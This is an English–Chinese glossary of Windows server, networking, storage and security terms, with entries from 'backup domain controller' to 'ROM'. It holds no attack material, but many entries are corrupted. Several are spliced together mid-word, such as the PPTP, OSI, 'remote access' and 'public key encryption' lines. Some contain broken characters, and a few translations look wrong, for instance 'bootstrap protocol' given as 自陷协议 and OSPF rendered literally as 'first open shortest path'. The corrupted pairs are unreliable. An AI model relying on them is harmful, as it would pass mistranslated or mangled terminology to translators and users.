backup domain controller, BDC / 备份域控制器

backup media pool / 备份媒体池

backup operator / 备份操作员

backup set / 备份集

backup set catalog / 备份集类别

backup types / 备份类型

bandwidth / 带宽

Bandwidth Allocation Protocol, BAP / 带宽分配协议

BAP, Bandwidth Allocation Protocol / 带宽分配协议

base priority / 基本优先级

basic disk / 基本磁盘

basic input/output system, BIOS / 基本输入/输出系统

basic storage / 基本存储

basic volume / 基本卷

batch program / 批处理程序

baud rate / 波特率

BDC, backup domain controller / 备份域控制器

Berkeley Internet Name Domain, BIND / Berkeley Internet 名称域

BGP, Border Gateway Protocol / 边界网关协议

binary / 二进制

binary digit (bit) / 二进制数字(位)

BIND, Berkeley Internet Name Domain / Berkeley Internet 名称域

BIND boot file / BIND 启动文件

bindery / 平构数据库

binding / 绑定

BINL (Boot Information Negotiation Layer) Service / BINL(启动信息协商层)服务

BIOS, basic input/output system / 基本输入/输出系统

bit (binary digit) / 位(二进制数字)

bits per second, bps / 每秒位数

boot / 启动

boot disk / 启动盘

boot files / 启动文件

Boot Information Negotiation Layer (BINL) Service / 启动信息协商层 (BINL) 服务

Boot Logging / 启动记录

boot partition / 启动分区

boot volume / 启动卷

BOOTP, bootstrap protocol / BOOTP 协议

BOOTP extensions / BOOTP 扩展

BOOTP Relay Agent / BOOTP 延迟代理

bootstrap protocol, BOOTP / 自陷协议

Border Gateway Protocol, BGP / 边界网关协议

bps, bits per second / 每秒位数

broadband integrated services digital network, B-ISDN / 宽带综合业务数字网

broadcast and unknown server, BUS / 广播和未知服务器

broadcast message / 广播消息

broadcast network / 广播网络

buffer / 缓冲区

built-in groups / 内置组

bus / 总线

BUS, broadcast and unknown server / 广播和未知服务器

bytes received / 接收的字节数

bytes transmitted / 传输的字节数

C
CA, certification authority / 证书颁发机构

cache / 高速缓存

cache file / 缓存文件

caching / 缓存

caching resolver / 缓存解析程序

Callback Control Protocol, CBCP / 回叫控制协议

callback number / 回叫号码

callback security / 回叫安全

called subscriber ID (CSID) string / 被呼叫的订阅者 ID 字符串

canonical (CNAME) resource record / 规范的 (CNAME) 资源记录

canonical name / 规范名称

CAPI, CryptoAPI

capture / 捕获

capture password / 捕获密码

capture trigger / 捕获触发器

cartridge font / 字库盒字体

catalog / 分类

CBCP, Callback Control Protocol / 回叫控制协议

CBR, constant bit rate / 恒定传输率

CCITT, Consultative Committee on Telephony and Telegraphy / 电话和电报咨询委员会

CCP, Compression Control Protocol / 压缩控制协议

CDFS, Compact Disc File System / 光盘文件系统

CDP, CRL Distribution Point / CRL 分发点

certificate / 证书

certificate revocation list, CRL / 证书吊销列表

Certificate Services / 证书服务

certificate store / 证书存储区

certificate template / 证书模板

certificate trust list, CTL / 证书信任列表

certification authority, CA / 证书颁发机构

certification hierarchy / 证书结构

certification path / 证书路径

Challenge Handshake Authentication Protocol, CHAP / 质询握手验证协议

channel / 信道

CHAP, Challenge Handshake Authentication Protocol / 质询握手验证协议

character mode / 字符模式

child domain / 子域

child object / 子对象

Chooser / 选取器

Chooser Pack / 选取器包

circuit switching / 电路交换

Class A IP address / A 类 IP 地址

Class B IP address / B 类 IP 地址

Class C IP address / C 类 IP 地址

classical IP over ATM, CLIP / 通过 ATM 的典型 IP

clear / 清除

clear-text passwords / 明文密码

client / 客户端

client application / 客户端应用程序

client request / 客户请求

Client Service for NetWare / NetWare 客户服务

CLIP, classical IP over ATM / 通过 ATM 的典型 IP

ClipBook Server / 剪贴簿服务器

cluster / 群集

cluster adapter / 群集适配器

Cluster Administrator / 群集管理器

Cluster Administrator extension / 群集管理器扩展

Cluster API / 群集 API

cluster log / 群集日志

Cluster service / 群集服务

cluster size / 簇大小

cluster storage / 群集存储

cluster-aware application / 支持群集的应用程序

cluster-unaware application / 不支持群集的应用程序

Cluster.exe

CNAME (canonical) resource record / CNAME(规范的)资源记录

CMYK color space / CMYK 色彩空间

code page / 代码页

codec / 编解码器color gamut / 色阶

color management / 色彩管理

color profile / 颜色配置文件

color space / 彩色空间

COM Internet Services Proxy / COM Internet 服务代理

Command Prompt window /“命令提示符”窗口

common groups / 公用组

communication port / 通讯端口

communication settings / 通讯设置

community name / 社团名

Compact Disc File System, CDFS / 光盘文件系统

Compression Control Protocol, CCP / 压缩控制协议

computer account / 计算机帐户

Computer Browser service / 计算机浏览器服务

computer quota / 计算机配额

computer-telephony integration, CTI / 计算机电话集成

conflict detection / 冲突检测

connect / 连接

connected user / 已连接的用户

connected, authenticating user / 已连接,正在验证用户

connected, user authenticated / 已连接,已验证用户

connection-oriented / 面向连接的

connectionless / 无连接的

connector application / 连接器应用程序

connector queue / 连接器队列

console tree / 控制台树

constant bit rate, CBR / 恒定传输率

Consultative Committee on Telephony and Telegraphy, CCITT / 电话和电报技术咨询委员会

container object / 容器对象

convergence / 会合

copy backup / 复制备份

count to infinity / 计数到无穷大

CPU Time / CPU 时间

CPU Usage / CPU 使用率

CRC errors / CRC 错误

CRL, certificate revocation list / 证书吊销列表

CRL Distribution Point, CDP / CRL 分发点

cross-reference object / 交叉引用对象

CryptoAPI (CAPI)

cryptographic service provider, CSP / 加密服务提供程序

cryptography / 加密

CSID (Called Subscriber ID) String / CSID(被叫订户 ID)字符串

CSP, cryptographic service provider / 加密服务提供程序

CTI, computer-telephony integration / 计算机电话集成

CTL, certificate trust list / 证书信任列表

custom file type / 自定义文件类型

D
D-channel / D 信道

DACL, discretionary access control list / 自由访问控制列表

daily backup / 每日备份

Data Communications Equipment, DCE / 数据通讯设备

data fork / 数据派生

DLC, Data Link Control / 数据链接控制

Data Terminal Equipment, DTE / 数据终端设备

data-overrun error / 数据溢出错误

DCE, Data Communications Equipment / 数据通讯设备

DDE, dynamic data exchange / 动态数据交换

dead-letter queue / 死信队列

debugger / 调试程序

dedicated adapter / 专用适配器

default button / 默认按钮

default host / 默认主机

default network / 默认网络

default printer / 默认打印机

default tree and context / 默认树和上下文

default user / 默认用户

default zone / 默认区域

defragmentation / 碎片整理

delegation / 委派

demand-dial connection/ 请求拨号连接

demand-dial routing / 请求拨号路由选择

dependency / 依存

dependency tree / 依存树

dependent client / 依存客户

descendent key / 派生项

desired zone / 所需区域

desktop / 桌面

desktop pattern / 桌面方案

destination document / 目标文档

details pane / 详细信息窗格

device . 设备

device conflict / 设备冲突

device driver / 设备驱动程序

device fonts / 设备字体

Device Manager / 设备管理器

DFS link / DFS 链接

DFS path / DFS 路径

DFS replication / DFS 复制

DFS root / DFS 根

DFS topology / DFS 拓扑

DHCP acknowledgment message, DHCPACK / DHCP 确认消息

DHCP class identifier / DHCP 类标识符

DHCP client / DHCP 客户

DHCP decline message, DHCPDECLINE / DHCP 拒绝消息

DHCP information message, DHCPINform / DHCP 信息消息

DHCP negative acknowledgment message, DHCPNAK / DHCP 反确认消息

DHCP offer message, DHCPOFFER / DHCP 提供消息

DHCP option / DHCP 选项

DHCP relay agent / DHCP 中继代理

DHCP release message, DHCPRELEASE / DHCP 释放消息

DHCP request message, DHCPREQUEST / DHCP 请求消息

DHCP server / DHCP 服务器

DHCP Service resource / DHCP 服务资源

DHCPACKDHCP, acknowledgment message / 确认消息

DHCPDECLINE, DHCP decline message / DHCP 拒绝消息

DHCPINform, DHCP information message / DHCP 信息消息

DHCPNAK, DHCP negative acknowledgment message / DHCP 反确认消息

DHCPOFFER, DHCP offer message / DHCP 提供消息

DHCPRELEASE, DHCP release message / DHCP 释放消息

DHCPREQUEST, DHCP request message / DHCP 请求消息

dial location / 拨号位置

dial-up connection / 拨号连接

dial-up line / 拨号线路

differential backup / 差异备份

digital signature / 数字签名

Digital Signature Standardm, DSS / 数字签名标准

digital subscriber line, DSL / 数字订户线路

digital video disc, DVD / 数字视频光盘

direct cable connection / 直接电缆连接

direct hosting / 直接宿主

direct memory access, DMA / 直接内存访问

directory / 目录

directory database / 目录数据库

directory partition / 目录分区

directory replication / 目录复制

Directory Service / 目录服务

disable / 禁用

discovery / 发现

discretionary access control list, DACL / 任意访问控制列表

disk / 磁盘

disk configuration information / 磁盘配置信息

disk mirroring / 磁盘镜像

dismount / 卸除

display adapter / 显示适配器

display password / 显示密码

distinguished name / 可分辨的名称

Distributed Transaction Coordinator resource / 分布式事务协调器资源

distribution group / 分配组

DLC, Data Link Control / 数据链接控件

DLL, dynamic-link library / 动态链接库

DMA, direct memory access / 直接内存访问

DNS

DNS dynamic update protocol / DNS 动态更新协议

DNS name servers / DNS 命名服务器

docking station / 插接站

document / 文档

domain / 域

domain controller / 域控制器

domain DFS / 域 DFS

domain local group / 域本地组

domain model / 域模型

domain name / 域名

domain namespace / 域名称空间

domain naming master / 域命名主机

domain of origin / 原始域

domain suffix / 域后缀

domain tree / 域目录树

dots per inch, DPI / 每英寸点数

downcasing / 小写转换

downloadable fonts / 可下载字体

DPI, dots per inch / 每英寸点数

drag / 拖动

drain / 损耗

drainstop / 损耗停止

drive / 驱动器

drive letter / 驱动器号

drop folder / 放入文件夹

DSL, digital subscriber line / 数字订户线路

DSS, Digital Signature Standard / 数字签名标准

DTE, Data Terminal Equipment / 数据终端设备

dual boot / 双重启动

duplex / 双工

DVD decoder / DVD 解码器

DVD, digital video disc / 数字视频光盘

DVD drive / DVD 驱动器

DWORD

dynamic data exchange, DDE / 动态数据交换

dynamic disk / 动态磁盘

DHCP

dynamic routing / 动态路由

dynamic storage / 动态存储

dynamic volume / 动态卷

dynamic-link library, DLL / 动态链接库

E
EAP, Extensible Authentication Protocol / 可扩展身份验证协议

EFS, encrypting file system / 加密文件系统

ELAN, emulated local area network / 仿真局域网

embedded object / 内嵌对象

emergency repair disk, ERD / 紧急修复磁盘

emulated local area network, ELAN / 仿真局域网

enable / 启用

encapsulated PostScript (EPS) file / EPS 文件

encapsulation / 封装

encrypted password / 加密密码

encrypting file system, EFS / 加密文件系统

encryption / 加密

enhanced small device interface, ESDI / 增强小型设备接口

environment variable / 环境变量

EPS (encapsulated PostScript) file / EPS 文件

ERD, emergency repair disk / 紧急修复磁盘

error detection / 错误检测

ESDI, enhanced small device interface / 增强小型设备接口

event / 事件

Event Log service / 事件日志服务

event logging / 事件记录

everyone category / everyone 类别

exclusion range / 排除范围

exclusive OR, XOR / 异或

expanded memory/ 扩充内存

expansion slot / 扩充插槽

expire interval / 过期间隔

explicit permissions / 直接权限

express message / 表达消息

extended memory / 扩展内存

extended partition / 扩展分区

Extensible Authentication Protocol, EAP / 可扩展身份验证协议

extension-type association / 扩展名类型关联

external network number / 外部网络号

F
failback / 故障回复

failback policy / 故障回复策略

failed / 失败

failover / 故障转移

failover policy / 故障转移策略

failover time / 故障转移时间

FAT, file allocation table / 文件分配表

FAT32

fault tolerance / 容错

Fax Service / 传真服务

FCB, file control block / 文件控制块

Federal Information Processing Standard 140-1, FIPS 140-1 / 联邦信息处理标准 140-1

FEP, front-end processor / 前端处理器

file allocation table, FAT / 文件分配表

File and Print Services for NetWare / NetWare 文件和打印服务

file control block, FCB / 文件控制块

file creator / 文件编写者

file fork / 文件派生

file replication service / 文件复制服务

File Services for Macintosh / Macintosh 文件服务

File Share resource / 文件共享资源

file system / 文件系统

File Transfer Protocol, FTP / 文件传输协议

file type / 文件类型

filter / 筛选器

filtering mode / 筛选模式

FIPS 140-1, Federal Information Processing Standard 140-1 / 联邦信息处理标准 140-1

firewall / 防火墙

firmware / 固件

font / 字体

font cartridge / 字体盒

foreground program / 前台程序

foreign computer / 异种计算机

forest / 树林

form / 表单

FORTEZZA

forward lookup / 正向搜索

forwarder / 转发程序

FQDN, fully qualified domain name / 完全合格域名

fragmentation / 碎片整理

frame / 帧

frame type / 帧类型

free media pool / 可用媒体池

free space / 可用空间

front-end processor, FEP / 前端处理器

FTP, File Transfer Protocol / 文件传输协议

full-duplex / 全双工

full name / 全名

full zone transfer, AXFR / 完整区域传送

fully qualified domain name, FQDN / 完全合格域名

G
gateway / 网关

gateway account / 网关帐户

Gateway Service for NetWare / NetWare 网关服务

GDI objects / GDI 对象

Generic Application resource / 一般应用程序资源

Generic Service resource / 一般服务资源

global account / 全局帐户

global catalog / 全局编录

global group / 全局组

glue chasing / 粘贴跟踪

glue records / 粘贴记录

graphics mode / 图形模式

gratuitous ARP / 免费 ARP

group / 组

group account / 组帐户

group memberships / 组成员身份

group name / 组名

Group Policy / 组策略

Group Policy object / 组策略对象

guest / 来宾

guest account / 来宾帐户

H
H.323

half-duplex / 半双工

handle count / 句柄数

handshaking / 握手

Hardware Compatibility List, HCL / 硬件兼容性列表

hardware compression / 硬件压缩

hardware configuration / 硬件配置

hardware decoder / 硬件解码器

hardware profile / 硬件配置文件

hardware type / 硬件类型

hash / 散列

hash algorithm / 散列算法

Hash-based Message Authentication Code, HMAC / 基于散列的消息验证代码

HCL, Hardware Compatibility List / 硬件兼容性列表

header error control, HEC / 报头错误控制

heartbeat / 信跳

HEC, header error control / 报头错误控制

heterogeneous environment / 异构环境

hexadecimal / 十六进制

high availability / 高可用性

histogram / 直方图

hive / 配置单元

HMAC, Hash-based Message Authentication Code / 基于散列的消息验证代码

home directory / 宿主目录

host / 主机

host ID / 主机 ID

host name / 主机名

horeplication / DFS 级

Hosts file / Hosts 文件

HTML, Hypertext Markup Language / 超文本标记语言

hub / 集线器

hubbed mode / 集中模式

hue / 色调

Hypertext Markup Language, HTML / 超文本标记语言

I
I/O (input/output) port / 输入/输出端口

IAS, Internet Authentication Service / Internet 验证服务

ICMP, Internet Control Message Protocol / 网际消息控制协议

IDE, integrated device electronics / 集成设备电路

IEEE 1394

IETF, Internet Engineering Task Force / Internet 工程任务组

IGMP, Internet Group Management Protocol / Internet 组管理协议

IIS, Internet Information Services / Internet 信息服务

IIS Server Instance resource / IIS 服务器实例资源

ILMI, integrated local management interface / 集成本地管理接口

Image Name / 图像名

IME, Input Method Editor / 输入法

impersonation / 模拟

import media pool / 导入媒体池

in-addr.arpa domain / in-addr.arpa 域

incremental backup / 增量备份

incremental zone transfer, IXFR / 增量区域传送

independent client / 独立客户

Indexing Service / 索引服务

.inf

infrared, IR / 红外

Infrared Data Association, IrDA / 红外数据联盟

infrared device / 红外设备

infrared file transfer / 红外文件传输

infrared network connection / 红外网络连接

infrared port / 红外端口

infrastructure master / 基础结构主机?/A>

inheritance / 继承

inherited permissions / 继承权限

Initial master / 初始主机?/A>

initialize / 初始化

input locale / 输入法区域设置

IME / Input Method Editor / 输入法

input/output (I/O) port / 输入/输出端口

install / 安装

integrated device electronics, IDE / 集成设备电路

integrated local management interface, ILMI / 集成本地管理接口

Integrated Services Digital Network, ISDN / 综合业务数字网

interactive dialog box / 交互式对话框

interactive logon / 交互式登录

interconnect / 相互连接

intermediary device / 中间设备

internal network number / 内部网络号

internal router / 内部路由器

international prefix / 国家(地区)电话前缀

International Telecommunication Union – Telecommunication (Standardization Sector), ITU-T / 国际电信联盟 – 电信(标准化部分)

Internet

Internet address / Internet 地址

Internet Authentication Service, IAS / Internet 验证服务

Internet Control Message Protocol, ICMP / 网际消息控制协议

Internet Engineering Task Force, IETF / Internet 工程任务组

Internet Group Management Protocol, IGMP / Internet 组管理协议

Internet group name / Internet 组名

Internet Information Services, IIS / Internet 信息服务

Internet Protocol, IP / 网际协议

Internet Protocol multicasting / 网际协议多播

Internet service provider, ISP / Internet 服务提供商

Internetwork Packet Exchange, IPX / 网间包交换

interrupt / 中断

interrupt request, IRQ / 中断请求

interrupt request (IRQ) lines / 中断请求线

intersite messaging service,ISM / 站间消息传递服务

IP, Internet Protocol / 网际协议

IP address / IP 地址

IP Address resource / IP 地址资源

IP multicasting / IP 多播

IPX, Internetwork Packet Exchange / 网间包交换

IPX/SPX

IR, infrared / 红外

IrDA, Infrared Data Association / 红外数据联盟

IRQ (interrupt request) lines / 中断请求线

ISDN, Integrated Services Digital Network / 综合业务数字网

ISM, intersite messaging service / 站间消息传递服务

ISP, Internet service provider / Internet 服务提供商

iteration / 循环

iterative query / 循环查询

ITU-T, International Telecommunication Union – Telecommunication [Standardization Sector] / 国际电信联盟 – 电信[标准化部分]

IXFR, incremental zone transfer / 增量区域传送

J
journal queue / 日志队列

journal quota / 日志配额

junction point / 交叉点

K
KDC, Key Distribution Center / 密钥分发中心

Kerberos V5

key / (注册表)项

Key Distribution Center, KDC / 密钥分发中心

keyboard layout / 键盘布局

L
L2TP, Layer 2 Tunneling Protocol / 第二层隧道协议

label / 标签

LAN, local area network / 局域网

LAN emulation, LANE / LAN 仿真

LAN emulation client, LEC / LAN 仿真客户端

LAN emulation server, LES / LAN 仿真服务器

LANE, LAN emulation / LAN 仿真

LANE emulation configuration server, LECS / LANE 仿真配置服务器

last known good configuration / 上次已知的正确配置

latency / 潜伏期

Layer 2 Tunneling Protocol, L2TP / 第二层隧道协议

LDAP, Lightweight Directory Access Protocol / 轻量级目录访问协议

LDAP Data Interchange format, LDIF / LDAP 数据交换格式

LDIF, LDAP Data Interchange format / LDAP 数据交换格式

lease / 租用

LEC, LAN emulation client / LAN 仿真客户端

LECS, LANE emulation configuration server / LANE 仿真配置服务器

LES, LAN emulation server / LAN 仿真服务器

library / 库

Lightweight Directory Access Protocol, LDAP / 轻量级目录访问协议

Line Printer Daemon, LPD / 行式打印机程序

Line Printer Remote, LPR / 行式打印机远程使用

link state database / 链接状态数据库

linked object / 链接的对象

LIS, logical IP subnet / 逻辑 IP 子网

LMHOSTS file / LMHOSTS 文件

load balancing / 负载平衡

local account / 本地帐户

local area network, LAN / 局域网

local computer / 本地计算机

local group / 本地组

local printer / 本地打印机

local service / 本地服务

local storage / 本地存储

local user profile / 本地用户配置文件

LocalTalk / 本地会话

location / 位置

log file / 日志文件

logical drive / 逻辑驱动器

logical IP subnet, LIS / 逻辑 IP 子网

logical printer / 逻辑打印机

logon rights / 登录权限

logon script / 登录脚本

logon script path / 登录脚本路径

logon workstations / 登录工作站

long distance operator / 长途接线员

long name / 长文件名

loose name checking / 宽限名称检查

LPD, Line Printer Daemon / 行式打印机程序

LPR, Line Printer Remote / 行式打印机远程使用

luminosity / 发光度

M
MAC, Message Authentication Code / 消息验证代码

MAC address / MAC 地址

machine-centric / 机器中心的

Macintosh-accessible volume / Macintosh 可访问卷

Macintosh-style permissions / Macintosh 风格的权限

MADCAP, Multicast Address Dynamic Client Allocation Protocol / 多播地址动态客户端分配协议

Make Changes / 进行更改

managed volume / 被管理卷

Management and Monitoring Tools / 管理和监视工具

Management Information Base, MIB / 管理信息库

management system / 管理系统

mandatory user profile / 强制用户配置文件

MAPI, Messaging API / 消息 API

MARS, multicast address resolution service / 多播地址解析服务

master boot record, MBR / 主引导记录

master domain / 主域

Master File Table, MFT / 主文件表

master server / 主服务器

maximize / 最大化

maximum password age / 密码最长使用期

MBR, master boot record / 主引导记录

MCS, multicast server / 多播服务器

MD2

MD4

MD5, Message Digest Five / 消息摘要 5

MDHCP, multicast DHCP / 多播 DHCP

media / 媒体

media access control address / 媒体访问控制地址

media pool / 媒体池

member server / 成员服务器

memory address / 内存地址

Memory Usage / 内存使用

Memory Usage Delta / 内存使用 Delta

message / 消息

Message Authentication Code, MAC / 消息身份验证代码

message digest / 消息摘要

Message Digest Five, MD5 / 消息摘要 5

Message Queuing / 消息列队

Message Queuing resource / 消息队列资源

Message Queuing server / 消息队列服务器

Messaging API, MAPI / 消息传递 API

Messenger service / 信使服务

metric / 跃点数

MFT, Master File Table / 主文件表

MIB, Management Information Base / 管理信息库

Microcom Networking Protocol Five, MNP5 / Microcom 网络协议 5

Microcom Networking Protocol Four, MNP4 / Microcom 网络协议 4

Microsoft Distributed Transaction Coordinator, MS DTC / Microsoft 分布式事务协调器

Microsoft Management Console, MMC / Microsoft 管理控制台

Microsoft Point-to-Point Encryption, MPPE / Microsoft 点对点加密

MIDI, Musical Instrument Digital Interface / 乐器数字接口

MIDI setup / MIDI 安装程序

minimize / 最小化

minimum password length / 最小密码长度

minimum TTL / 最小的 TTL

mirror / 镜像

mirror set / 镜像集

mirrored volume / 镜像卷

mixed mode / 混合模式

MMC, Microsoft Management Console / Microsoft 管理控制台

MNP4, Microcom Networking Protocol Four / Microcom 网络协议 4

MNP5, Microcom Networking Protocol Five / Microcom 网络协议 5

modem / 调制解调器

modem compression / 调制解调器压缩

modulation standards / 调制标准

mount / 装入

mounted drive / 已装入的驱动器

MPPE, Microsoft Point-to-Point Encryption / Microsoft 点对点加密

MPR, MultiProtocol Routing / 多协议路由

MS DTC, Microsoft Distributed Transaction Coordinator / Microsoft 分布式事务协调器

MS-DOS

MS-CHAP ( Challenge Handshake Authentication Protocol) / 质询握手验证协议

MS-DOS-based program / 基于 MS-DOS 的程序

MSMQ

multibyte / 多字节

Multicast Address Dynamic Client Allocation Protocol, MADCAP / 多播地址动态客户端分配协议

multicast address resolution service, MARS / 多播地址解析服务

multicast datagram / 多播数据报

multicast DHCP, MDHCP / 多播 DHCP

multicast media access control address / 多播媒体访问控制地址

multicast scope / 多播范围

multicast server, MCS / 多播服务器

multicasting / 多播

multihomed computer / 多宿主计算机

multilink dialing / 多链路拨号

multimaster replication / 多主线复制

multimedia streaming / 多媒体流

multiple boot / 多重启动

MultiProtocol Routing, MPR / 多协议路由

Musical Instrument Digital Interface, MIDI / 乐器数字接口

My Documents / 我的文档

N
name / 名称

name mapping / 名称映射

name resolution / 名称解析

name server (NS) resourcdatagram / 名称服务器资源记录

named pipe / 命名管道

namespace / 名称空间

naming context / 命名上下文

naming service / 命名服务

NAS, network access server / 网络访问服务器

native mode / 本机模式

NCP, NetWare Core Protocol / NetWare 核心协议

NDIS, network driver interface specification / 网络?动程序接口规范

NDS, Novell Directory Services / Novell 目录服务

negative caching / 相反缓存

NetBEUI, NetBIOS Enhanced User Interface / NetBIOS 增强用户接口

NetBIOS, network basic input/output system / 网络基本输入/输出系统

NetBIOS Enhanced User Interface, NetBEUI / NetBIOS 增强用户接口

e record / dering / Netmask 排序

NetWare Core Protocol, NCP / NetWare 核心协议

network access server, NAS / 网络访问服务器

network adapter / 网卡

network administrator / 网络管理员

network basic input/output system, NetBIOS / 网络基本输入/输出系统

network bridge / 网桥

network card driver / 网卡驱动程序

Network DDE service / 网络 DDE 服务

network driver / 网络驱动程序

network driver interface specification, NDIS / 网络驱动程序接口规范

network file system, NFS / 网络文件系统

network gateway / 网关

network ID / 网络 ID

Network Information Service, NIS / 网络信息服务

network media / 网络媒体

Network Name resource / 网络名称资源

Network News Transfer Protocol, NNTP / 网络新闻传输协议

network number / 网络号

network partition / 网络分区

network/bit-masked identifier / 网络/位掩码标识符

network-to-network interface, NNI / 网络对网络接口

NFS, network file system / 网络文件系统

NIS, Network Information Service / 网络信息服务

NNI, network-to-network interface / 网络对网络接口

NNTP, Network News Transfer Protocol / 网络新闻传输协议

node / 节点

nonauthoritative restore / 非强制性还原

noncontainer object / 非容器对象

nonhubbed mode / 非集中模式

nonpaged memory / 未分页内存

nonpaged pool / 未分页池

intrasitive trust / 不可传递的信任

normal backup / 普通备份

notify list / 通知列表

Novell Directory Services, NDS / Novell 目录服务

NS (name server) resource record / 名称服务器源记录

nslookup

NTFS file system / NTFS 文件系统

NTGATEWAY

null modem cable / 零调制解调器电缆

NWLink

O
object / 对象

object identifier / 对象标识符

offline / 脱机

OLE

on-disk catalog / 磁盘目录

on-media catalog / 媒体目录

one-way trust / 单向信任

online / 联机

Open Shortest Path First, OSPF / 首先打开最短路径

Open Systems Interconnectionnpaged memory / 式系统互连模型

OpenType fonts / OpenType 字体

operations master / 操作主机

operator / 运算符

organizational unit / 组织单位

orphan / 孤儿

orphan file / 孤立文件

OS/2

OSChooser

OSI, Open Systems Interconnection model / 开放式系统互连模型

OSPF, Open Shortest Path First / 最先打开最短路径

owner / 所有者

owner category / 所有者类别

P
p-node / p 节点

package / 程序包

packet / 数据包

packet assembler/disassembler, PAD / 分组拆装器

packet header / 数据包报头

packet switching / 数据包交换

PAD, packet assembler/disassembler / 分组拆装程序

page fault / 页错误

Page Faults Delta / 页错误 Delta

paged pool / 分页的池

paging file / 页面文件

PAP, Password Authentication Protocol / 密码身份验证协议

paper source / 纸张来源

parent domain / 父域

parent object / 父对象

parenting / 父处理

parity / 奇偶校验

parity bit / 奇偶校验位

partition / 分区

partition boot sector / 分区启动扇区

password / 密码

Password Authentication Protocol, PAP / 密码身份验证协议

paused / 已暂停

PBX, Private Branch Exchange / 专用分交机交换

PC Card / PC 卡

PCL, Printer Control Language / 打印机控制语言

PDC, primary domain controller / 主域控制器

PDC emulator master / PDC 模拟主机

Peak Memory Usage / 高峰内存使用

pel

pending / 挂起

Per Seat Licensing / 每客户授权

Per Server Licensing / 每服务器授权

performance alert / 性能警报

performance counter / 性能计数器

performance object / 性能对象

performance object instance / 性能对象实例

permanent virange / rcuit, PVC / 永久虚电路

permission / 权限

Physical Disk resource / 物理盘资源

PID, process identifier / 进程标识符

PIF, program information file / 程序信息文件

ping

pixel / 像素

PJL, Printer Job Language / 打印机作业语言

PKCS, Public Key Cryptography Standards / 公钥密码系统标准

PKCS #7

PKCS #10

PKCS #12

PKI, public key infrastructure / 公钥基础结构

plotter font / 绘图仪字体

Plug and Play / 即插即用

PNNI, private or public network-to-network interface / 专用或公用网络到网络接口

point of presence, POP / 存在点

point of termination station, POTS / 终端站点

Point-to-Point Protocol, PPP / 点对点协议

Point-to-Point Tunneling Protocol, PPTP / 点对点隧道协议

pointer (PTR) resource record / 指针 (PTR) 资源纪录

poison reverse / 有损反转

policy / 策略

polling intervals / 轮询间隔

POP, point of presence / 存在点

port / 端口

port ID / 端口 ID

port rule / 端口规则

POSIX

possible owners / 可能的所有者

PostScript

PostScript fonts / PostScript 字体

PostScript printer / PostScript 打印机

POTS, point of termination station / 终站点

power conditioning / 电源调节

PPP, Point-to-Point Protocol / 点对点协议

PPTP, Point-to-PKCS #7

PKCS #10

PKCS #12

PKI, public key infrastructure / ferred owner / 首选所有者

preferred server / 首选服务器

preset-to callback / 预设回叫

Primary disk / 主磁盘

primary domain controller, PDC / 主域控制器

primary group / 主要组

primary master / 主要主机

primary partition / 主分区

print job / 打印作业

print processor / 打印处理器

print server / 打印服务器

Print Server for Macintosh / Macintosh 打印服务器

print spooler / 打印后台处理程序

Print Spooler resource / 打印后台处理程序资源

printer / 打印机

Printer Control Language, PCL / 打印机控制语言

printer driver / 打印机驱动程序

printer fonts / 打印机字体

Printer Job Language, PJL / 打印机作业语言

printer permissions / 打印机权限

Printer window / 打印机窗口

Printers / 打印机

printing pool / 打印池

Private Branch Exchange, PBX / 专用分机交换

private key / 私钥

private network / 专用网络

private or publn configuration server / LANE e, PNNI / 专用或公用网络到网络接口

private queue / 专用队列

private volume / 专用卷

privileges / 特权

process identifier, PID / 进程标识符

program / 程序

program information file, PIF / 程序信息文件

property / 属性

property cache / 属性缓存

property value age Faults Delta / 议

protocol parser / 协议分析程序

PSTN, Public Switched Telephone Network / 公共电话交换网络

PTR (pointer) resource record / PTR(指针)资源纪录

public key / 公钥

public key cryptography / 公钥密码系统

Public Key Cryptography Standards, PKCS / 公钥密码系统标准

public , LANE / LAN n / 公钥加密

public key infrastructure, PKI / 公钥基础结构

public network / 公共网络

public queue / 公用队列

Public Switched Telephone Network, PSTN / 公共电话交换网络

pull partner / 拉伙伴

pulse dialing / 脉冲拨号

push partner / 推伙伴

PVC, permanent virtual circuit / 永久虚电路

Q
QoS, Quality of Service / 服务质量

QoS Admission Control Service / QoS 许可控制服务

Quality of Service, QoS / 服务质量

query / 查询

queue / 队列

queue quota / 队列配额

queue type ID / 队列类型 ID

quiet answer / 静音应答

quorum log / 仲裁日志

quorum resource / 仲裁资源

quota on / / 配额限制

R
RADIUS, Remote Authentication Dial-In User Service / 远程身份验证拨入用户服务

RAID, Redundant Array of Independent Disks / 独立磁盘冗余阵列

RAID-5 volume / RAID-5 卷

RAM, random-access memory / 随机访问内存

random-access memory, RAM / 随机访问内存

raster fonts / 光栅字体?

read-only memory, ROM / 只读内存

Real-Time Transport Protocol, RTP / 实时传输协议

realm / 领域

realm name / 领域名

rebinding state / 重新绑定状态

reconciliation / 会合

recoverable message / 可恢复的信息

recovery agent / 故障恢复代理

Recovery Console / 故障恢复控制台

recursion / 递归

recursive query / 递归查询

Recycle Bin / 回收站

reduced instruction set computing, RISC / 精简指令集计算

Redundant Array of Independent Disks, RAID / 独立磁盘冗余阵列

referral / 备用

referral server / 备用服务器

refresh / 刷新

refresh interval / 刷新间隔

refresh rate / 刷新速度

region / 区?

registered file type / 已注册文件类型

registry / 注册表

registry boot / 注册表启动

registry size limit, RSL / 注册表大小限制

relative distinguished name / 相对辨别名称

relative ID / 相对 ID

relative ID master / 相对 ID 主机

relative name / 相对名称

remote access / 远程访问

remote acceM adaptation layer / ATM te administration / 远程管理

Remote Authentication Dial-In User Service, RADIUS / 远程身份验证拨入用户服务

remote computer / 远程计算机

Remote Installation Services / 远程安装服务

remote procedure call, RPC / 远程过程调用

remote storage / 远程存储

Remote Storage / 远程存储

removable media / 可移动媒体

Removable Storage / 可移动存储

rendering intent / 调整颜色

rendezvous / 集合点

replica / 副本

replica set / 副本集

replication / 副本

replication policy / 副本策略

replication topology / 副本拓扑

report message / 报告消息

report queue / 报告队列

Request for Comments, RFC / 注释请求

required callback / 必需回叫

reservation / 保留

resolver / 解析程序

resource / 资源

resource allocation / 资源分配

Resource DLL / 资源 DLL

resource domain / 资源域

resource fork / 资源派生

Resource Monitor / 资源监视器

resource record, RR / 资源记訓

resource record set, RRset / 资源记录集

Resource Reservation Protocol, RSVP / 资源保护协议

resource types / 资源类型

response / 响应

response message / 响应消息

response queue / 响应队列

retry interval / 重试间隔

reverse lookup / 反向搜索

RFC, Request for Comments / 注释请求

RGB color space / RGB 颜色区

RIPX, Routing Information Protocol over IPX / 在 IPX 上的路由信息协议

RISC, reduced instruction set computing / 精简指令集计算

roaming user profile / 漫游用户配置文件

ROM, read-only memory / 只读内存

